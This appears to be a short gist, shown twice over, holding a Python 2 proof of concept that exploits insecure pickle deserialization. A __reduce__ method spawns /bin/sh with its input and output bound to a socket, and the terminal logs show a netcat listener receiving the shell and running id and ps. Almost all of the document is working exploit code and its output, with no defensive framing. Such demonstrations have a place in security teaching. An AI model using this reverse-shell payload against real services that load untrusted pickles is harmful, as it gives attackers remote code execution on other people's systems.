inaz2 · August 29, 2015 14:08
diff --git a/exploiting-pickle.py b/exploiting-pickle.py
 import cPickle
 import subprocess
 import base64
 import socket

 s = socket.create_connection(('localhost', 5000))

 class Exploit(object):
    def __reduce__(self):
        fd = s.fileno()
        return (subprocess.Popen,
                (('/bin/sh',),  # args
                 0,             # bufsize
                 None,          # executable
                 fd, fd, fd     # std{in,out,err}
                 ))

 # token to be sent
 token = base64.b64encode(cPickle.dumps(Exploit()))
 print token

 # load the received token
 token = cPickle.loads(base64.b64decode(token))
 print token['data']
diff --git a/gistfile1.txt b/gistfile1.txt
 # terminal 1

 $ python exploiting-pickle.py
 Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwpJMApOSTMKSTMKSTMKdFJwNAou
 Traceback (most recent call last):
  File "test.py", line 24, in <module>
    print token['data']
 TypeError: 'Popen' object has no attribute '__getitem__'

 # terminal 2

 $ nc -l 5000 -v
 Listening on [0.0.0.0] (family 0, port 5000)
 Connection from [127.0.0.1] port 5000 [tcp/*] accepted (family 2, sport 36824)
 id
 uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
 ps auxf
 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
 ...
 user      8926  0.0  0.0   4444   656 pts/1    S    18:09   0:00 /bin/sh
 user      8933  0.0  0.1  19560  1324 pts/1    R    18:09   0:00  \_ ps auxf
	import cPickle
	import subprocess
	import base64
	import socket

	s = socket.create_connection(('localhost', 5000))

	class Exploit(object):
	def __reduce__(self):
	fd = s.fileno()
	return (subprocess.Popen,
	(('/bin/sh',), # args
	0, # bufsize
	None, # executable
	fd, fd, fd # std{in,out,err}
	))

	# token to be sent
	token = base64.b64encode(cPickle.dumps(Exploit()))
	print token

	# load the received token
	token = cPickle.loads(base64.b64decode(token))
	print token['data']
	# terminal 1

	$ python exploiting-pickle.py
	Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwpJMApOSTMKSTMKSTMKdFJwNAou
	Traceback (most recent call last):
	File "test.py", line 24, in <module>
	print token['data']
	TypeError: 'Popen' object has no attribute '__getitem__'

	# terminal 2

	$ nc -l 5000 -v
	Listening on [0.0.0.0] (family 0, port 5000)
	Connection from [127.0.0.1] port 5000 [tcp/*] accepted (family 2, sport 36824)
	id
	uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
	ps auxf
	USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
	...
	user 8926 0.0 0.0 4444 656 pts/1 S 18:09 0:00 /bin/sh
	user 8933 0.0 0.1 19560 1324 pts/1 R 18:09 0:00 \_ ps auxf